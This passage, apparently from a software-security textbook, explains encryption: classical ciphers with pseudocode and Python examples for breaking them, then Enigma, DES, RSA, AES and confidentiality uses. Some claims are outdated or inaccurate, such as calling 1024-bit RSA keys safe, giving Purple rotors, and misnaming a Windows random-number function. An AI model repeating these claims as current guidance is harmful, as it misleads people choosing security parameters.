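   std::string out = message;
   for (int i = 0; i < (int)out.size(); i++)
      out[i] ^= key; // XOR-ing twice with the same key restores the byte
   return out;
}
```

Applying the function once produces the ciphertext; applying it again with the same key recovers the plaintext.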
There are several ways to classify encryption algorithms: symmetric vs.
asymmetric, stream vs. block ciphers, and steganography vs. cryptography.
Symmetric vs. Asymmetric
Secure message transmission between Alice and Bob involves Alice encrypting a
message and Bob decrypting it. There are two basic ways this can be done:
symmetric and asymmetric:
Symmetric Symmetric algorithms use the same key to both encrypt a message and decrypt
a message. This means that anyone who can decrypt a message can also encrypt
one. Symmetric algorithms tend to be faster than asymmetric ones. In fact, they
are typically a hundred times faster!
Asymmetric Asymmetric algorithms are also known as public-key. They use a different key to
encrypt a message than to decrypt one. This means it is possible to segment the
world of users into three categories: those who have the ability to create a
cryptogram, those able to read a cryptogram, and those lacking the ability to do
either. Asymmetric algorithms are commonly used in scenarios when the author
of the message needs to be confirmed. If the decrypt key is commonly known,
then the authorship of a message can be restricted to only the set of individuals
possessing the encryption key.
Block A block algorithm sub-divides messages into chunks, each chunk being operated
on somewhat independently. For example, the DES algorithm works on 64-bit
blocks whereas AES works on 128-bit blocks. Block algorithms often provide
security and performance advantages over stream algorithms because more
complex algorithms can be used.
Note that the distinction between a block and a stream is completely artificial.
For example, consider one algorithm that operates on 8-bit blocks and another
on 2048-bit blocks. Most would classify the former as stream and the latter as
block even though both work on blocks of different sizes. In other words, all block
algorithms are also stream and vice versa; the distinction is not very important.
Steganography vs. Cryptography
Confidentiality is one of the main goals of encryption. However, often one wishes
for confidentiality in the existence of the message rather than in the content of
the message.
Steganography The process of making the existence of the message difficult for Eve to detect.
Steganography is useful when the goal of the transmission is to keep Eve from
knowing that the message exists (Anderson & Petitcolas, 1998).
Encryption Attacks
The history of encryption development is paralleled by the history of encryption
attacks. Most ad-hoc ciphers are easily broken because they do not rely on sound
mathematical principles. Getting cryptography right is extremely difficult and
requires very good mathematical and analytical skills.
There are three broad categories of attacks relating to the amount of access the
attacker has to the algorithm: chosen plaintext attacks, known plaintext attacks,
and ciphertext only attacks.
Chosen plaintext The adversary may ask for specific plaintexts to be encrypted; the goal is to find
the key. For example, Eve convinces Alice to encrypt a plaintext message of Eve's
choosing. Eve then gains important clues as to the type of algorithm used and
the nature of the key. Another example is Eve being in possession of the
algorithm itself: she sends in several plaintext messages and carefully analyzes
the resulting ciphertext in hopes of uncovering the key. Note that this is one of
the rare scenarios where the speed of the algorithm works to the advantage of
the attacker: the more efficient the algorithm, the more messages the attacker
can use to find the key.
Known plaintext The adversary has the ciphertext and the plaintext and the goal is to find the key
used in the encryption. For example, Eve is in possession of both the ciphertext
and the plaintext, with which she attempts to uncover the key. With this key, she
can decipher future ciphertext. Any time Eve knows something about the
plaintext, it is considered a known plaintext attack. One common known
plaintext attack is the Golden Bug. The Golden Bug attack leverages the fact that
the frequency of letters in the alphabet is known for a given language. In English,
for example, the letter 'E' is the most common. By analyzing the ciphertext for
the number of occurrences of a given letter, the real letter can be found by
comparing the commonality of the given letter with the standard for that
language.
Ciphertext only The adversary has the ciphertext and the goal is to find the plaintext meaning.
Eve intercepts the ciphertext and, from it alone, is able to derive the key and thus
the plaintext. One may argue that it is impossible to create a ciphertext only
attack because the attacker will have no way of knowing if the real plaintext is
found. In other words, if the attacker has no knowledge of the plaintext, it is
impossible to differentiate an invalid plaintext from the valid one. All successful
ciphertext only attacks involve at least partial knowledge of the plaintext, such
as the language the plaintext message is written in.
Encryption attacks are thwarted with key management and key size. Key
management is the process of preventing the key from falling into the hands of
Eve. If, for example, Eve is able to predict Alice’s key, then there is no point in
trying a more laborious attack on the algorithm. This is why it is important to use
a cryptographically strong random number generator when creating a key.
Key size is the number of possible keys for a given algorithm. We normally
measure key size in bits. For example, if the key size is 8 bits, then there are 2^8
or 256 possible keys. This means Eve has a 1/256 chance of guessing the key on
the first try, or only has to try 256 keys before being guaranteed to find the
correct one.
Primitive ciphers (algorithms developed before the age of computers) are
characterized by having small key sizes. They provide confidentiality assurances
by incomprehensibility (the ciphertext looks unreadable) or obscurity (no one
knows how the algorithm works). However, a determined Eve can often decipher
cryptograms without much difficulty.
Modern algorithms can have very large keys. Even in the presence of complete
knowledge of how the algorithm works, it is still extremely difficult to find the
key. Thus modern algorithms rely on the strength of the key rather than the
obscurity of the algorithm to provide security assurances.
Codebooks
The earliest examples of encryption systems can be traced to the Egyptians
around 2,000 BC. Funeral hieroglyphics were carved into tombs using a primitive
code system in order to obscure their meaning. Note that the goal was not to hide
a message as it is with today’s algorithms, but rather to increase the mystery of
the writing. Only privileged individuals could decipher the message.
Algorithm
A codebook works by creating a mapping between a phrase, word, or sound and
a given token. This mapping is represented in a dictionary, which constitutes the
key. The most convenient data structure to represent such a dictionary is an
associative array (also known as a map). Given this key, the encryption
algorithm C+ is straightforward:
C+(Mp, K)
    FOR i ← each token in Mp
        Mc[i] ← K[Mp[i]]
    RETURN Mc
The loop will iterate through all the tokens (representing phrases, words, or
sounds) in the plaintext Mp. Each of these tokens Mp[i] will be sent to the map K
and the return value will be added onto the ciphertext Mc.
The decryption algorithm is much the same except we will need to perform a
reverse-lookup using the map’s find method.
C-(Mc, K)
    FOR i ← each token in Mc
        Mp[i] ← K.find(Mc[i])
    RETURN Mp
Since the same codebook is used for the encryption and the decryption process,
this algorithm can be classified as symmetric.
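The pseudocode above maps directly onto a dictionary in most languages. A minimal sketch in Python, using a tiny made-up codebook (a real key would be a large dictionary of phrases):

```python
# Hypothetical codebook: the key K maps plaintext tokens to code groups
K = {"ATTACK": "7312", "AT": "0045", "DAWN": "8890"}
K_reverse = {code: word for word, code in K.items()}  # for the reverse lookup

def encrypt(tokens, key):
    # C+: look up each plaintext token in the map, emitting its code group
    return [key[t] for t in tokens]

def decrypt(codes, reverse_key):
    # C-: the reverse lookup, recovering each token from its code group
    return [reverse_key[c] for c in codes]
```

Here `encrypt(["ATTACK", "AT", "DAWN"], K)` yields `["7312", "0045", "8890"]`; since the same codebook serves both directions, the algorithm is symmetric.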
Strength
Codebooks are vulnerable to chosen plaintext attacks. If Eve sent all possible
words through the encryption algorithm, she would be able to derive the entirety
of the codebook.
Codebooks are also vulnerable to known plaintext attacks. For each known word
sent through the algorithm, the corresponding ciphertext will be known. This will
result in another known entry in the codebook. Thus, parts of the codebook can
be derived by observing the codebook in action over a period of time.
Before and during WWI, Germany used a codebook for all secure communications.
Unbeknownst to them, many transmissions were intercepted by British
Intelligence. As a result, large swaths of the codebook were known.
In January of 1917, Germany was concerned that America would enter the war on
the side of the Allies. In an effort to reduce the American influence on the war,
German High Command proposed to Mexico that if it entered the war against
America, it could reclaim Texas, Arizona, and New Mexico. A telegram with this
proposal was sent from German Foreign Secretary Arthur Zimmermann to
Heinrich von Eckardt, the German ambassador in Mexico. It was intercepted and
decoded by the British. The resulting scandal helped push America into WWI
against Germany.
Figure 12.4: The Zimmermann Telegram. Photograph No. 302025, "Zimmermann Telegram,"
January 1917. Reproduced with permission from National Archives
Monoalphabetic
Though credit is generally given to Julius Caesar for developing the
monoalphabetic encryption algorithm (also known as the Caesar Cipher),
historical evidence suggests he was just an early adopter. Around 50 BC, Julius
Caesar frequently shifted the letters in his messages down the alphabet when
communicating sensitive messages. This was not a very secure method because
he always used exactly the same key: +3 (or shift to the right by 3 characters).
Algorithm
The monoalphabetic algorithm consists of shifting the alphabet of letters in the
message to the left or right a given number of slots. For the purposes of
illustration, consider two lists of characters. The first list we will call the source
alphabet, the second will be called the destination alphabet. To encrypt a given
letter, one looks up that letter on the source alphabet and finds the
corresponding letter on the destination alphabet. For example, consider the shift
of 7 characters from the source to the destination alphabet:
Source A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Destination H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
Figure 12.5: Monoalphabetic algorithm shifting from the top alphabet to the bottom
In the above illustration, notice how the destination alphabet (starting with ‘H’)
is shifted from the source alphabet. The amount of this shift constitutes the key.
To encrypt the letter ‘C’, look up the letter in the source alphabet and find the
corresponding letter on the destination alphabet as indicated with the arrow. This
is repeated for each letter in the plaintext:
CIPHERS → JPWOLYZ
Notice how we need to take into account the size of the alphabet so we can wrap
around at the end. The monoalphabetic algorithm is symmetric, but the algorithm
is slightly different on the decryption side: the key +3 performs a right-shift on
encryption but a left-shift on decryption.
C-(Mc, K)
    FOR i ← each token in Mc
        Mp[i] ← (Mc[i] - K) % sizeAlphabet
    RETURN Mp
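The full symmetric pair can be sketched in a few lines of Python; decryption simply negates the key:

```python
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def mono_encrypt(plaintext, key):
    # Shift each letter 'key' slots down the alphabet, wrapping at the end
    return "".join(ALPHABET[(ALPHABET.index(c) + key) % len(ALPHABET)]
                   for c in plaintext)

def mono_decrypt(ciphertext, key):
    # Decryption is the same operation with the shift reversed
    return mono_encrypt(ciphertext, -key)
```

With the key of 7 from the illustration above, `mono_encrypt("CIPHERS", 7)` produces `"JPWOLYZ"`.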
Strength
The monoalphabetic algorithm is vulnerable to chosen plaintext attacks. If Eve is
able to specify the letter ‘A’ into a plaintext and then observe the resulting
ciphertext, then she can derive the key. The monoalphabetic algorithm is also
vulnerable to known plaintext attacks for exactly the same reason.
Consider the scenario where Eve only knows that the plaintext was in English. By
observing a sizeable amount of ciphertext, she can guess the key in a single
attempt. This is because the use of letters in the English language is not evenly
distributed: the letter 'e' appears in English text about 12% of the time. If a letter
appears in the ciphertext about 12% of the time, that letter in the ciphertext
probably corresponds to the letter 'e' in the plaintext. This is called the "Golden
Bug" attack, as it was first described in the story "The Gold-Bug" written by Edgar
Allan Poe in 1843.
Finally, a monoalphabetic key can be derived even when insufficient ciphertext is
available to perform a statistical analysis. Consider, for example, an alphabet of
32 characters (26 letters plus a space and a few punctuation marks). If Eve tries
each of the 32 possible keys and checks whether the resulting plaintext is English,
the plaintext message and the key can be readily determined. Only with very large
alphabets (such as Chinese, where there are between 7,000 and 106,230
characters depending on how you count them) is the monoalphabetic algorithm
even remotely secure.
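The exhaustive search is easily sketched: try every shift of the ciphertext and keep any candidate that appears in a dictionary of known words (here a tiny stand-in for a real English word list):

```python
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def shift(text, key):
    # Shift each letter 'key' slots down the alphabet, wrapping at the end
    return "".join(ALPHABET[(ALPHABET.index(c) + key) % 26] for c in text)

def crack_mono(ciphertext, dictionary):
    # Only 26 possible keys exist, so try each and test the resulting text
    for key in range(26):
        candidate = shift(ciphertext, -key)
        if candidate in dictionary:
            return key, candidate
    return None
```

For example, `crack_mono("JPWOLYZ", {"CIPHERS", "SECRET"})` recovers the key 7 and the plaintext `"CIPHERS"`.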
As a final aside, your standard “secret decoder ring” is monoalphabetic. In this
case, the destination alphabet is represented as numbers rather than letters.
Polyalphabetic
Originally developed by Leon Alberti (the “father of western cryptology”) in 1467,
the polyalphabetic algorithm was the most advanced encryption algorithm of the
time. Its introduction marked the beginning of the renaissance of cryptography in
Europe spanning the next several hundred years. The original method was
constructed of two copper disks with the alphabet inscribed on them.
Algorithm
The polyalphabetic (or multi-alphabet) algorithm is just like the monoalphabetic
except that there is more than one shifted alphabet. In the following example,
Destination 1 is +7, Destination 2 is -3, and Destination 3 is +11:
Source A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Destination 1 H I J K L M N O P Q R S T U V W X Y Z A B C D E F G
Destination 2 X Y Z A B C D E F G H I J K L M N O P Q R S T U V W
Destination 3 L M N O P Q R S T U V W X Y Z A B C D E F G H I J K
Figure 12.6: Polyalphabetic algorithm
With each successive character encoded, the next row is used. After the last row
has been used, the first row is used again. Thus:
CIPHERS → JFAOBCZ
Notice how the key is an array containing multiple offsets. Other than this detail,
the algorithm is the same.
As with monoalphabetic, the polyalphabetic algorithm is symmetric but has a
slightly different C- than C+ in that the shifting is reversed.
C-(Mc, K)
    FOR i ← each token in Mc
        Mp[i] ← (Mc[i] - K[i % sizeKey]) % sizeAlphabet
    RETURN Mp
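In Python, the only change from the monoalphabetic sketch is indexing into an array of offsets; the key [7, -3, 11] matches the rows in the figure above:

```python
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def poly_encrypt(plaintext, key):
    # The i-th letter is shifted by key[i % len(key)], cycling through the rows
    return "".join(ALPHABET[(ALPHABET.index(c) + key[i % len(key)]) % 26]
                   for i, c in enumerate(plaintext))

def poly_decrypt(ciphertext, key):
    # Symmetric: decryption applies the same cycle with each offset negated
    return poly_encrypt(ciphertext, [-k for k in key])
```

As in the example above, `poly_encrypt("CIPHERS", [7, -3, 11])` produces `"JFAOBCZ"`.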
Strength
The key to a polyalphabetic algorithm can be readily derived using a chosen
plaintext attack. Unlike the monoalphabetic algorithm, where a single character is
sufficient to derive the key, the number of characters in the key determines the
amount of text that needs to be encrypted. For example, a polyalphabetic
algorithm with 10 offsets requires exactly 10 characters to be encoded before the
full key can be determined. The same can be said for a known plaintext attack.
When Eve has only partial knowledge of the plaintext (such as the language in
which it is written), then a frequency analysis similar to the monoalphabetic can
be employed. To demonstrate this, consider a polyalphabetic key consisting of 26
characters encrypting an alphabet of 26 characters. By just looking at the
ciphertext, all letters will appear to have been used approximately the same
number of times (assuming the key uses all 26 possible offsets in the key). The
Golden Bug appears to be useless in this case! To crack this key, we will sub-divide
the large stream of ciphertext into 26 smaller streams by skipping every 26 slots.
The first stream will contain element 1, 27, 53, and so on. The second stream will
contain element 2, 28, 54, and so on. Now each of these individual streams will
correspond to a single part of the key. In fact, one can say that each of these
individual streams is encrypted with a monoalphabetic algorithm. Thus we can
apply the Golden Bug to them individually and derive the key.
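The sub-division step is a simple slicing operation; once the key length is known (or guessed), each stream can be attacked as an independent monoalphabetic cipher:

```python
def split_streams(ciphertext, key_length):
    # Characters i, i+key_length, i+2*key_length, ... were all shifted by the
    # same offset, so each slice is effectively a monoalphabetic ciphertext.
    return [ciphertext[i::key_length] for i in range(key_length)]
```

For example, `split_streams("ABCDEFGH", 3)` groups positions {0,3,6}, {1,4,7}, and {2,5} into `["ADG", "BEH", "CF"]`, each of which can then be given the Golden Bug treatment.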
Book Cipher
A book cipher is an encryption method where the plaintext message is converted
to ciphertext through the use of a key and a large volume of text (Leighton &
Matyas, 1984). The key serves as instructions for picking the ciphertext from the
volume. A large number of book cipher algorithms have been used through the
years, each with varying degrees of practicality and security. The first was
proposed in 1586 by Blaise de Vigenere, where a transparent sheet of paper was
placed over a volume of text. Alice would then circle the letters or words of the
plaintext on the transparent sheet. In this case, the ciphertext is the transparent
sheet and the key is the volume of text.
Algorithm
In the 18th century, book cipher techniques improved somewhat. From a given
volume of text, Alice would identify words or letters corresponding to the
plaintext. She would then note the page number, row, and word number on a
sheet of paper. The resulting coordinates constitute the ciphertext.
A more widely used variation of the book cipher involves starting at the beginning
of the book and then skipping ahead a random number of lines. From that point,
search for a word beginning with the letter you wish to encrypt. When that word
is found, the offset from the beginning is the resulting ciphertext. Next, from that
point, skip ahead another random number of lines. From there, start to search
for a word beginning with the next letter in the plaintext. When a word is found,
take note of its offset from the previously found word. This is the second letter in
the ciphertext. This process continues until the plaintext has been converted.
C+(Mp, K)
    offsetPrevious ← 0
    FOR i ← each token in Mp
        offsetNext ← offsetPrevious + random()
        offsetNext ← findWordBeginningWithLetter(offsetNext, K, Mp[i])
        Mc[i] ← offsetNext - offsetPrevious
        offsetPrevious ← offsetNext
    RETURN Mc
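A runnable sketch of this variation, with the key modeled as a list of the book's words; the skip distance and the tiny book here are invented for illustration, and a real implementation would index an entire volume:

```python
import random

def book_encrypt(plaintext, book_words, rng=random):
    # Each ciphertext element is the offset (in words) from the previously
    # chosen word to the next word starting with the desired letter.
    ciphertext, prev = [], 0
    for letter in plaintext:
        pos = prev + rng.randrange(1, 10)            # skip ahead randomly
        while book_words[pos % len(book_words)][0] != letter:
            pos += 1                                 # search for a match
        ciphertext.append(pos - prev)                # record relative offset
        prev = pos
    return ciphertext

def book_decrypt(offsets, book_words):
    # Walk the same book, accumulating offsets and reading first letters
    letters, pos = [], 0
    for off in offsets:
        pos += off
        letters.append(book_words[pos % len(book_words)][0])
    return "".join(letters)
```

The random skips mean the same plaintext encrypts differently each time, yet anyone holding the same book can still walk the offsets back to the message.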
XOR
The XOR encryption algorithm is perhaps the most common primitive encryption
algorithm to utilize the product method. Product algorithms were first described
by Claude Shannon (the individual who adapted George Boole’s work to
computing systems) in 1949 as a unique approach to cryptography (Shannon,
1949).
Algorithm
This method implies that a block of text is run through the mathematical
operation XOR with the key to generate the ciphertext. If the plaintext is
(Mp = 010101) and the key is (K = 111000), then the ciphertext is (Mc = 101101):

        010101
    XOR 111000
        ------
        101101

Note that XOR is its own inverse: applying the same key to the ciphertext yields
the plaintext again. The XOR algorithm is therefore vulnerable to known
plaintext attacks. The pseudocode for the XOR algorithm is the following:
C+(Mp, K)
    FOR i ← each token in Mp
        Mc[i] ← Mp[i] XOR K
    RETURN Mc
This algorithm is symmetric and the decryption method is exactly the same:
C-(Mc, K)
RETURN C+(Mc, K)
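In Python, with the key repeated across the message bytes (a repeating-key XOR, as the pseudocode describes):

```python
def xor_crypt(message: bytes, key: bytes) -> bytes:
    # XOR each message byte with the corresponding key byte, cycling the key.
    # Because (m ^ k) ^ k == m, this one function both encrypts and decrypts.
    return bytes(m ^ key[i % len(key)] for i, m in enumerate(message))
```

Calling `xor_crypt` on a ciphertext with the same key restores the original plaintext, which is exactly the symmetry the pseudocode above expresses with C- delegating to C+.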
Strength
The XOR algorithm is extremely vulnerable to chosen plaintext or known plaintext
attacks. This is because if A XOR B = C, then A XOR C = B. Thus, if the plaintext and
the ciphertext is known, it is trivial to derive the key.
If the plaintext is not known, then the strength of the algorithm depends on the
size of the key. For example, if the key is 32 bits, then there are 2^32 possible
keys. It turns out that not all the keys need to be tested. For a 32-bit key, there
will be 4 bytes encoded with each repetition of the key. This means we can treat
the single ciphertext encrypted with a 32-bit key as 4 ciphertexts encrypted with
8-bit sub-keys. Each of
these can be cracked individually. To do this, we will once again use the Golden
Bug. We will search each of the ciphertexts for the most frequent pattern of bits.
These will probably be ‘e’ or the space character. If one assumes it is the ‘e’, we
have a known plaintext and we can derive the sub-key. This is applied to the other
three ciphertexts until all four sub-keys are known. The final step is to decrypt the
entire message using the derived key. Note that if every 4th letter is unexpected,
then one of the sub-keys is probably incorrect. Go back and decrypt using the
second most common letter in the English language.
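The sub-key attack described above can be written directly. This sketch assumes the most common plaintext byte in each stream is the space character; with real text the guess may need to be revised, as the paragraph notes:

```python
from collections import Counter

def crack_subkey(stream: bytes, guess: int = ord(" ")) -> int:
    # The most frequent ciphertext byte presumably encrypts the guessed
    # plaintext byte; XOR-ing them recovers the sub-key (since A XOR C = B).
    most_frequent = Counter(stream).most_common(1)[0][0]
    return most_frequent ^ guess

def crack_xor(ciphertext: bytes, key_size: int) -> bytes:
    # Treat the ciphertext as key_size interleaved single-byte ciphertexts
    return bytes(crack_subkey(ciphertext[i::key_size])
                 for i in range(key_size))
```

Each stream is cracked independently, so the work grows with the key length rather than with 2 raised to the key length, which is why repeating-key XOR is so weak.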
Rotor machines
The Enigma Machine is one of the most important encryption methods in history
and probably the one most influential in the development of modern algorithms.
Though it relied on mechanical operations to work, its design was based on
sound mathematics that ensured a high degree of message confidentiality. A
commercial version of the Enigma was developed in the 1920s and the German
military adapted this design shortly after the Nazis assumed control.
The Enigma was a rotor machine which had four wheels containing letters. When
a plaintext key was pressed on the keyboard, an electrical circuit would pass into
one rotor, then on to the second, then on to the third, then bounce off a reflector
and come back through the third rotor, then the second, and back to the first. In
the end, a light would appear indicating the corresponding ciphertext. The final
step would be to rotate each of the rotors. The end result of this complex
operation was an effective key size of 87 bits (2^87 possible keys).
Figure 12.7: Enigma Machine (Reproduced with permission from www.cryptomuseum.com)

Efforts to crack the Enigma began in 1932 in Poland. Having obtained several
machines and the operations manuals describing how they were to be used,
several messages were decrypted in the 1930s. With the onset of WWII, cracking
efforts moved to Bletchley Park in the English countryside. There Alan Turing built
what many consider to be one of the first true computers to crack the Enigma
code. This computer, called the Bombe, performed a known plaintext attack on
intercepted German transmissions.
In the end, it was a combination of captured key tables, operator mistakes, and
procedural weaknesses that allowed the Allies to decipher most messages. Some
claim that the war was shortened by as much as a year due to their efforts.
The Japanese used a similar machine code-named "Purple" in the Second World
War. It had three rotors like the German Enigma and 25 switchboard connections.
The effective key size of the Purple was 46 bits (2^46 possible keys). In an effort
to crack this machine, American scientists had obtained and cracked its two
predecessors (called Blue and Red) and then built their own copy of Purple.
Evidence suggests that the Japanese believed Purple to be uncrackable and did
not revise either the technology or the procedure by which it was operated during
the war. Though it was not completely cracked, the Americans were able to break
many codes using a chosen-plaintext attack. The Soviet Union was also able to
crack Purple, which contributed to their decision to leave their eastern frontiers
undefended during the war.

Figure 12.8: Purple (Reproduced with permission from www.ciphermachines.com)
The American WWII encryption machine was called the SIGABA, which was similar
to the Enigma with an important innovation: the rotors advanced in an
unpredictable way. This gave a key size of 2^90.6 possible keys (about 90.6 bits),
though as used in WWII the effective key size was 2^71. There is no evidence that
the SIGABA was ever cracked. In fact, the Germans were said to have quit
collecting SIGABA intercepts because the cipher was determined to be too strong.
DES
In 1965, the Brooks Act was passed, giving the National Bureau of Standards the
authority and responsibility to create a new encryption standard designed for
non-military applications. The intention of this work was to identify a method that
would be viable for 10-15 years. In 1973, vendors were invited to submit products
or techniques to be used for this new standard. When no suitable proposals
arrived, the invitation was repeated in 1974, and the government resorted to
pressuring companies to allow their internal algorithms to be used for the
standard. IBM had one such algorithm, called Lucifer, which had a 128-bit key.
DES was derived from Lucifer but with a 56-bit key, significantly weaker than
IBM's original design. The standard was approved in 1976 and was revised in
1988. It was not until 1997 that DES was cracked, with a distributed search finding
the key after trying 18 quadrillion of the 72 quadrillion possible keys; the
following year a specialized device (called Deep Crack, costing $250,000) broke
DES in a matter of days. Today, it can be broken in about 6 days with $10,000 in
hardware costs. DES lasted 21 years after being approved, longer than the 10-15
it was designed to last.
A key aspect of the design is the existence of 16 rounds. Each round consists of a
simple algorithm similar to primitive methods such as the polyalphabetic or XOR.
Each round also generates a new set of keys for the rounds that follow. DES, while
old, is still a standard used across much of the world.
One of its successors (TDES or 3DES) is actually nothing more than triple
encryption using two or three DES keys. While still not unbreakable, most of the
attacks on TDES fall into the category of “certification weaknesses.” This means
attacks are theoretically possible though infeasible to mount in the real world.
The adoption of the DES standard can be considered one of the defining events
of the field of cryptography. It represents the first widely publicized and
internationally standardized encryption algorithm, spawning a generation of
mathematicians to study cryptography. Prior to DES, most cryptographers were
members of the military and various intelligence agencies. After DES, an academic
study of encryption, decryption, and computer security became possible.
RSA
Up through the mid-1970s, all known practical encryption algorithms were
symmetric. This means that anyone who can decrypt a message can also encrypt
a message with the same key. One implication of this design is that the
authorship of a given message cannot be narrowed beyond the set of people able
to decrypt the message. There are many message-passing scenarios not served
by this design, such as establishing message authorship. To address these
scenarios, asymmetric encryption algorithms are needed.
Asymmetric algorithms use a different key for the encryption process than the
decryption process:
Mc ← C(Mp, P+)
Mp ← C(Mc, P-)
In other words, full knowledge of the password used to encrypt the message
provides no help in decrypting the message.
Three mathematicians from M.I.T. (Ronald Rivest, Adi Shamir, and Leonard
Adleman) started working on this problem: a practical public-key encryption
algorithm (Rivest & Shamir, 1983). After many false starts, they settled on
factoring as the basis for their algorithm. The approach promised to be easy for
those encrypting messages (multiplication and primality testing are not
computationally expensive) while difficult for attackers (factorization was
believed to be extremely difficult). To test this theory, the first RSA factoring
challenge (RSA-129) was introduced in Scientific American in 1977. The first to
factor the following number was to be awarded a $100 prize:
114,381,625,757,888,867,669,235,779,976,146,612,010,218,296,721,242,362,
562,561,842,935,706,935,245,733,897,830,597,123,563,958,705,058,989,075,
147,599,290,026,879,543,541
It was initially estimated to take 40 quadrillion years to factor this number, but it
was successfully factored in 1994 by about 1,600 computers using novel factoring
methods. Hidden within these digits was the message: "The magic words are
squeamish ossifrage."
The RSA encryption algorithm relies on the fact that large prime numbers are
easy to generate and multiply together, but the resulting product is extremely
difficult to factor. The details of how this algorithm works and the mathematical
properties RSA uses to accomplish this task are beyond the scope of this
textbook. The important things to know about RSA are the following:
• RSA is the most commonly used asymmetric (also known as public-key)
  algorithm to have been developed.
• A 1024-bit RSA key is considered safe today and probably will be for the next
  decade. 2048-bit keys will probably be secure for the next century unless there
  is a drastic improvement in factoring technology.
• RSA is 100 to 1000 times slower than comparable symmetric algorithms. For
  this reason, RSA is typically used to exchange symmetric keys.
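Although the full mathematics is out of scope, the flavor of it can be shown with a toy example using tiny primes (real keys use primes hundreds of digits long, and this sketch omits padding and everything else a real implementation needs):

```python
# Toy RSA key generation with tiny primes -- illustration only
p, q = 61, 53
n = p * q                 # public modulus: 3233 (easy to compute)
phi = (p - 1) * (q - 1)   # 3120; recovering it requires factoring n
e = 17                    # public (encryption) exponent, coprime with phi
d = pow(e, -1, phi)       # private exponent: modular inverse of e (2753)

m = 65                    # a message encoded as a number less than n
c = pow(m, e, n)          # encrypt with the public key: m^e mod n
assert pow(c, d, n) == m  # decrypt with the private key: c^d mod n
```

Anyone may know (n, e) and encrypt; only the holder of d can decrypt, and deriving d from (n, e) requires factoring n. (The three-argument `pow(e, -1, phi)` requires Python 3.8 or later.)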
AES
The Advanced Encryption Standard (AES) is specified by the National Institute of
Standards and Technology (NIST). It was the result of a years-long effort to
replace the aging DES standard (Landau, 2000). The NIST had several
requirements for the algorithm to be selected as the new standard:
• It needed to be symmetric (private key).
• It had to support a block size of 128 bits.
• It had to support key sizes of 128, 192, and 256 bits.
In September of 1997, NIST formally requested the submission of candidate
algorithms for evaluation. Of the 21 candidates, 15 met NIST's criteria. Each
algorithm was analyzed according to verifiability, efficiency of implementation,
and performance. The Rijndael cipher, created by Joan Daemen and Vincent
Rijmen of Belgium, was selected as the leading candidate. In November 2001,
after four years of testing and comparison, the Rijndael algorithm was selected
as the standard. In June 2003, AES was certified for use protecting classified
government documents, though the original intention was for it to be used only
on unclassified material.
AES works by applying a number of key-dependent Boolean transformations to
the plaintext. The decryption process is the inverse with the same key (Rijndael is
a symmetric algorithm). These Boolean transformations consist of shifts and
rotations, XORs, byte and word substitutions, and shuffling. In other words, each
round performs primitive algorithmic operations on the data. It is the
combination of these rounds, done in a predetermined order, that provides the
confidentiality assurances.
The complete AES algorithm is the following:
AES(byte in[4*Nb], byte out[4*Nb], word w[Nb*(Nr+1)])
    byte state[4,Nb]
    state = in
    AddRoundKey(state, w[0, Nb-1])
    FOR round = 1 TO Nr-1
        SubBytes(state)
        ShiftRows(state)
        MixColumns(state)
        AddRoundKey(state, w[round*Nb, (round+1)*Nb-1])
    SubBytes(state)
    ShiftRows(state)
    AddRoundKey(state, w[Nr*Nb, (Nr+1)*Nb-1])
    out = state
end
AES is tuned to produce an optimum of “confusion and diffusion”, while still being
quick and efficient. In other words, each step (SubBytes, ShiftRows, MixColumns, and
AddRoundKey) is computationally simple while adding a high degree of entropy to
the cipher stream. It is meant to be implemented easily in both hardware and
software.
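To make the "confusion and diffusion" idea concrete, here is a toy substitution-permutation round in Python. The S-box is an invented affine map chosen only because it is invertible; this is emphatically not the real AES round function:

```python
# Hypothetical invertible S-box: an affine map on bytes (gcd(7, 256) == 1,
# so every input maps to a distinct output and the step can be undone)
SBOX = [(7 * x + 3) % 256 for x in range(256)]

def toy_round(state, round_key):
    state = [SBOX[b] for b in state]                  # substitution: confusion
    state = state[1:] + state[:1]                     # rotation: diffusion
    return [b ^ k for b, k in zip(state, round_key)]  # mix in the round key
```

Each individual step is trivially invertible on its own; security comes from iterating many such key-dependent rounds in a fixed, predetermined order.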
AES has the following properties:
• AES is fast when implemented in software as well as with dedicated hardware
  implementations.
• AES-128 (using a 128-bit key) is secure for the foreseeable future. There have
  been many attempts to crack Rijndael since the adoption of AES. None have had
  more than a theoretical effect. One of the latest and most successful reduced
  the difficulty of obtaining an encryption key from the previous 2^119 to 2^110.5
  for AES-128. This is no cause for immediate alarm, since 2^110.5 is well outside
  of practical calculability. The largest known successful brute-force attack on a
  symmetric ciphertext was on a 64-bit key.
Applications
There are many reasons why a software engineer would choose to use an
encryption algorithm. These include confidentiality, identification of authorship,
key exchange, certification, and integrity.
Confidentiality
The most obvious application of encryption technology is to keep Eve from
reading a confidential message. Several common confidentiality scenarios include
the following:
Attachments Add a password to your spreadsheet, word processor document, PDF, or other
document so it can be sent via e-mail securely. In this case, a symmetric algorithm
such as AES should be employed. Both Alice and Bob share the knowledge of the
password.
Files A user may choose to put a password on his/her checkbook file. In this case, Alice
and Bob are the same individual. Again, a symmetric algorithm would be used.
Shared Assets Imagine a software product that stores passwords, account information, and
other private data for members of a family. This software product stores all the
assets in a file on a desktop computer or a mobile application. Periodically the
software synchronizes all the files so all the members of the family can have
access to these assets. Again, a symmetric algorithm such as AES would be a good
choice.
Message Passing A mobile communications company wishes to offer confidentiality assurances to
their many wireless customers. This can be accomplished through a symmetric
algorithm as long as both members of a given conversation share the same key.
The trick is to get them to agree on the key at the beginning of the conversation
without Eve’s interception. This key exchange needs to be accomplished through
a different mechanism.
In most confidentiality scenarios, a symmetric algorithm such as AES would be
employed. Our confidentiality assurance comes from two sources: the secrecy of
the key and the strength of the algorithm.
Figure 12.11: Confidentiality where Alice sends Bob a message after first exchanging keys
For Alice and Bob to exchange a secret message, they need to first agree upon a
secret key K. Choosing a weak or well-known key will severely compromise their
confidentiality hopes. For example, a password such as “1234” or “password”
would be among the first Eve would guess. In fact, humans are particularly bad at
choosing strong keys. Instead, a cryptographically strong random number
generator should be employed. The best such generators take as input external
measurements that are known to be chaotic, such as cosmic white noise. On
Microsoft Windows systems, you can use CryptGrnRandom() to achieve this,
taking two dozen system measurements into account to produce a strong
random number. These numbers are computationally indistinguishable from
